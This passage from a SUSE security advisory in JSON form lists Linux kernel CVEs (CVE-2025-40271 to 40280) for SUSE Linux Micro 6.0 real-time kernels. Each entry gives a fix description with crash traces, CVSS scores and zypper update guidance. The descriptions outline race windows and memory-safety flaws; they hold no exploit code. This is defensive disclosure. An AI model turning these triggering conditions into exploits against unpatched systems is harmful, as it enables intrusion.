read_unlock(\u0026proc_subdir_lock); | remove_proc_subtree()\n | write_lock(\u0026proc_subdir_lock);\n [time window] | rb_erase(\u0026root-\u003esubdir_node, \u0026parent-\u003esubdir);\n | write_unlock(\u0026proc_subdir_lock);\n read_lock(\u0026proc_subdir_lock); |\n next = pde_subdir_next(de); |\n pde_put(de); |\n de = next; //UAF |\n\nrbtree of dev_snmp6\n |\n pde(tun3)\n / \\\n NULL pde(tun2)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40271",
"url": "https://www.suse.com/security/cve/CVE-2025-40271"
},
{
"category": "external",
"summary": "SUSE Bug 1255297 for CVE-2025-40271",
"url": "https://bugzilla.suse.com/1255297"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40271"
},
{
"cve": "CVE-2025-40272",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40272"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/secretmem: fix use-after-free race in fault handler\n\nWhen a page fault occurs in a secret memory file created with\n`memfd_secret(2)`, the kernel will allocate a new folio for it, mark the\nunderlying page as not-present in the direct map, and add it to the file\nmapping.\n\nIf two tasks cause a fault in the same page concurrently, both could end\nup allocating a folio and removing the page from the direct map, but only\none would succeed in adding the folio to the file mapping. The task that\nfailed undoes the effects of its attempt by (a) freeing the folio again\nand (b) putting the page back into the direct map. However, by doing\nthese two operations in this order, the page becomes available to the\nallocator again before it is placed back in the direct mapping.\n\nIf another task attempts to allocate the page between (a) and (b), and the\nkernel tries to access it via the direct map, it would result in a\nsupervisor not-present page fault.\n\nFix the ordering to restore the direct map before the folio is freed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40272",
"url": "https://www.suse.com/security/cve/CVE-2025-40272"
},
{
"category": "external",
"summary": "SUSE Bug 1254832 for CVE-2025-40272",
"url": "https://bugzilla.suse.com/1254832"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40272"
},
{
"cve": "CVE-2025-40273",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40273"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: free copynotify stateid in nfs4_free_ol_stateid()\n\nTypically copynotify stateid is freed either when parent\u0027s stateid\nis being close/freed or in nfsd4_laundromat if the stateid hasn\u0027t\nbeen used in a lease period.\n\nHowever, in case when the server got an OPEN (which created\na parent stateid), followed by a COPY_NOTIFY using that stateid,\nfollowed by a client reboot. New client instance while doing\nCREATE_SESSION would force expire previous state of this client.\nIt leads to the open state being freed thru release_openowner-\u003e\nnfs4_free_ol_stateid() and it finds that it still has copynotify\nstateid associated with it. We currently print a warning and is\ntriggerred\n\nWARNING: CPU: 1 PID: 8858 at fs/nfsd/nfs4state.c:1550 nfs4_free_ol_stateid+0xb0/0x100 [nfsd]\n\nThis patch, instead, frees the associated copynotify stateid here.\n\nIf the parent stateid is freed (without freeing the copynotify\nstateids associated with it), it leads to the list corruption\nwhen laundromat ends up freeing the copynotify state later.\n\n[ 1626.839430] Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n[ 1626.842828] Modules linked in: nfnetlink_queue nfnetlink_log bluetooth cfg80211 rpcrdma rdma_cm iw_cm ib_cm ib_core nfsd nfs_acl lockd grace nfs_localio ext4 crc16 mbcache jbd2 overlay uinput snd_seq_dummy snd_hrtimer qrtr rfkill vfat fat uvcvideo snd_hda_codec_generic videobuf2_vmalloc videobuf2_memops snd_hda_intel uvc snd_intel_dspcfg videobuf2_v4l2 videobuf2_common snd_hda_codec snd_hda_core videodev snd_hwdep snd_seq mc snd_seq_device snd_pcm snd_timer snd soundcore sg loop auth_rpcgss vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vmw_vmci vsock xfs 8021q garp stp llc mrp nvme ghash_ce e1000e nvme_core sr_mod nvme_keyring nvme_auth cdrom vmwgfx drm_ttm_helper ttm sunrpc dm_mirror dm_region_hash dm_log iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse dm_multipath dm_mod nfnetlink\n[ 1626.855594] CPU: 2 UID: 0 PID: 199 Comm: kworker/u24:33 Kdump: loaded Tainted: G B W 6.17.0-rc7+ #22 PREEMPT(voluntary)\n[ 1626.857075] Tainted: [B]=BAD_PAGE, [W]=WARN\n[ 1626.857573] Hardware name: VMware, Inc. VMware20,1/VBSA, BIOS VMW201.00V.24006586.BA64.2406042154 06/04/2024\n[ 1626.858724] Workqueue: nfsd4 laundromat_main [nfsd]\n[ 1626.859304] pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 1626.860010] pc : __list_del_entry_valid_or_report+0x148/0x200\n[ 1626.860601] lr : __list_del_entry_valid_or_report+0x148/0x200\n[ 1626.861182] sp : ffff8000881d7a40\n[ 1626.861521] x29: ffff8000881d7a40 x28: 0000000000000018 x27: ffff0000c2a98200\n[ 1626.862260] x26: 0000000000000600 x25: 0000000000000000 x24: ffff8000881d7b20\n[ 1626.862986] x23: ffff0000c2a981e8 x22: 1fffe00012410e7d x21: ffff0000920873e8\n[ 1626.863701] x20: ffff0000920873e8 x19: ffff000086f22998 x18: 0000000000000000\n[ 1626.864421] x17: 20747562202c3839 x16: 3932326636383030 x15: 3030666666662065\n[ 1626.865092] x14: 6220646c756f6873 x13: 0000000000000001 x12: ffff60004fd9e4a3\n[ 1626.865713] x11: 1fffe0004fd9e4a2 x10: ffff60004fd9e4a2 x9 : dfff800000000000\n[ 1626.866320] x8 : 00009fffb0261b5e x7 : ffff00027ecf2513 x6 : 0000000000000001\n[ 1626.866938] x5 : ffff00027ecf2510 x4 : ffff60004fd9e4a3 x3 : 0000000000000000\n[ 1626.867553] x2 : 0000000000000000 x1 : ffff000096069640 x0 : 000000000000006d\n[ 1626.868167] Call trace:\n[ 1626.868382] __list_del_entry_valid_or_report+0x148/0x200 (P)\n[ 1626.868876] _free_cpntf_state_locked+0xd0/0x268 [nfsd]\n[ 1626.869368] nfs4_laundromat+0x6f8/0x1058 [nfsd]\n[ 1626.869813] laundromat_main+0x24/0x60 [nfsd]\n[ 1626.870231] process_one_work+0x584/0x1050\n[ 1626.870595] worker_thread+0x4c4/0xc60\n[ 1626.870893] kthread+0x2f8/0x398\n[ 1626.871146] ret_from_fork+0x10/0x20\n[ 1626.871422] Code: aa1303e1 aa1403e3 910e8000 97bc55d7 (d4210000)\n[ 1626.871892] SMP: stopping secondary CPUs",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40273",
"url": "https://www.suse.com/security/cve/CVE-2025-40273"
},
{
"category": "external",
"summary": "SUSE Bug 1254828 for CVE-2025-40273",
"url": "https://bugzilla.suse.com/1254828"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40273"
},
{
"cve": "CVE-2025-40274",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40274"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: guest_memfd: Remove bindings on memslot deletion when gmem is dying\n\nWhen unbinding a memslot from a guest_memfd instance, remove the bindings\neven if the guest_memfd file is dying, i.e. even if its file refcount has\ngone to zero. If the memslot is freed before the file is fully released,\nnullifying the memslot side of the binding in kvm_gmem_release() will\nwrite to freed memory, as detected by syzbot+KASAN:\n\n ==================================================================\n BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353\n Write of size 8 at addr ffff88807befa508 by task syz.0.17/6022\n\n CPU: 0 UID: 0 PID: 6022 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full)\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n kvm_gmem_release+0x176/0x440 virt/kvm/guest_memfd.c:353\n __fput+0x44c/0xa70 fs/file_table.c:468\n task_work_run+0x1d4/0x260 kernel/task_work.c:227\n resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]\n exit_to_user_mode_loop+0xe9/0x130 kernel/entry/common.c:43\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n syscall_exit_to_user_mode_work include/linux/entry-common.h:175 [inline]\n syscall_exit_to_user_mode include/linux/entry-common.h:210 [inline]\n do_syscall_64+0x2bd/0xfa0 arch/x86/entry/syscall_64.c:100\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n RIP: 0033:0x7fbeeff8efc9\n \u003c/TASK\u003e\n\n Allocated by task 6023:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:414\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x3e2/0x700 mm/slub.c:5758\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n kvm_set_memory_region+0x747/0xb90 virt/kvm/kvm_main.c:2104\n kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154\n kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\n Freed by task 6023:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5c/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2533 [inline]\n slab_free mm/slub.c:6622 [inline]\n kfree+0x19a/0x6d0 mm/slub.c:6829\n kvm_set_memory_region+0x9c4/0xb90 virt/kvm/kvm_main.c:2130\n kvm_vm_ioctl_set_memory_region+0x6f/0xd0 virt/kvm/kvm_main.c:2154\n kvm_vm_ioctl+0x957/0xc60 virt/kvm/kvm_main.c:5201\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nDeliberately don\u0027t acquire filemap invalid lock when the file is dying as\nthe lifecycle of f_mapping is outside the purview of KVM. Dereferencing\nthe mapping is *probably* fine, but there\u0027s no need to invalidate anything\nas memslot deletion is responsible for zapping SPTEs, and the only code\nthat can access the dying file is kvm_gmem_release(), whose core code is\nmutual\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40274",
"url": "https://www.suse.com/security/cve/CVE-2025-40274"
},
{
"category": "external",
"summary": "SUSE Bug 1254830 for CVE-2025-40274",
"url": "https://bugzilla.suse.com/1254830"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40274"
},
{
"cve": "CVE-2025-40275",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40275"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix NULL pointer dereference in snd_usb_mixer_controls_badd\n\nIn snd_usb_create_streams(), for UAC version 3 devices, the Interface\nAssociation Descriptor (IAD) is retrieved via usb_ifnum_to_if(). If this\ncall fails, a fallback routine attempts to obtain the IAD from the next\ninterface and sets a BADD profile. However, snd_usb_mixer_controls_badd()\nassumes that the IAD retrieved from usb_ifnum_to_if() is always valid,\nwithout performing a NULL check. This can lead to a NULL pointer\ndereference when usb_ifnum_to_if() fails to find the interface descriptor.\n\nThis patch adds a NULL pointer check after calling usb_ifnum_to_if() in\nsnd_usb_mixer_controls_badd() to prevent the dereference.\n\nThis issue was discovered by syzkaller, which triggered the bug by sending\na crafted USB device descriptor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40275",
"url": "https://www.suse.com/security/cve/CVE-2025-40275"
},
{
"category": "external",
"summary": "SUSE Bug 1254829 for CVE-2025-40275",
"url": "https://bugzilla.suse.com/1254829"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40275"
},
{
"cve": "CVE-2025-40277",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40277"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Validate command header size against SVGA_CMD_MAX_DATASIZE\n\nThis data originates from userspace and is used in buffer offset\ncalculations which could potentially overflow causing an out-of-bounds\naccess.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40277",
"url": "https://www.suse.com/security/cve/CVE-2025-40277"
},
{
"category": "external",
"summary": "SUSE Bug 1254894 for CVE-2025-40277",
"url": "https://bugzilla.suse.com/1254894"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40277"
},
{
"cve": "CVE-2025-40278",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40278"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: act_ife: initialize struct tc_ife to fix KMSAN kernel-infoleak\n\nFix a KMSAN kernel-infoleak detected by the syzbot .\n\n[net?] KMSAN: kernel-infoleak in __skb_datagram_iter\n\nIn tcf_ife_dump(), the variable \u0027opt\u0027 was partially initialized using a\ndesignatied initializer. While the padding bytes are reamined\nuninitialized. nla_put() copies the entire structure into a\nnetlink message, these uninitialized bytes leaked to userspace.\n\nInitialize the structure with memset before assigning its fields\nto ensure all members and padding are cleared prior to beign copied.\n\nThis change silences the KMSAN report and prevents potential information\nleaks from the kernel memory.\n\nThis fix has been tested and validated by syzbot. This patch closes the\nbug reported at the following syzkaller link and ensures no infoleak.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40278",
"url": "https://www.suse.com/security/cve/CVE-2025-40278"
},
{
"category": "external",
"summary": "SUSE Bug 1254825 for CVE-2025-40278",
"url": "https://bugzilla.suse.com/1254825"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40278"
},
{
"cve": "CVE-2025-40279",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40279"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sched: act_connmark: initialize struct tc_ife to fix kernel leak\n\nIn tcf_connmark_dump(), the variable \u0027opt\u0027 was partially initialized using a\ndesignatied initializer. While the padding bytes are reamined\nuninitialized. nla_put() copies the entire structure into a\nnetlink message, these uninitialized bytes leaked to userspace.\n\nInitialize the structure with memset before assigning its fields\nto ensure all members and padding are cleared prior to beign copied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40279",
"url": "https://www.suse.com/security/cve/CVE-2025-40279"
},
{
"category": "external",
"summary": "SUSE Bug 1254846 for CVE-2025-40279",
"url": "https://bugzilla.suse.com/1254846"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40279"
},
{
"cve": "CVE-2025-40280",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40280"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: Fix use-after-free in tipc_mon_reinit_self().\n\nsyzbot reported use-after-free of tipc_net(net)-\u003emonitors[]\nin tipc_mon_reinit_self(). [0]\n\nThe array is protected by RTNL, but tipc_mon_reinit_self()\niterates over it without RTNL.\n\ntipc_mon_reinit_self() is called from tipc_net_finalize(),\nwhich is always under RTNL except for tipc_net_finalize_work().\n\nLet\u0027s hold RTNL in tipc_net_finalize_work().\n\n[0]:\nBUG: KASAN: slab-use-after-free in __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]\nBUG: KASAN: slab-use-after-free in _raw_spin_lock_irqsave+0xa7/0xf0 kernel/locking/spinlock.c:162\nRead of size 1 at addr ffff88805eae1030 by task kworker/0:7/5989\n\nCPU: 0 UID: 0 PID: 5989 Comm: kworker/0:7 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/18/2025\nWorkqueue: events tipc_net_finalize_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __kasan_check_byte+0x2a/0x40 mm/kasan/common.c:568\n kasan_check_byte include/linux/kasan.h:399 [inline]\n lock_acquire+0x8d/0x360 kernel/locking/lockdep.c:5842\n __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 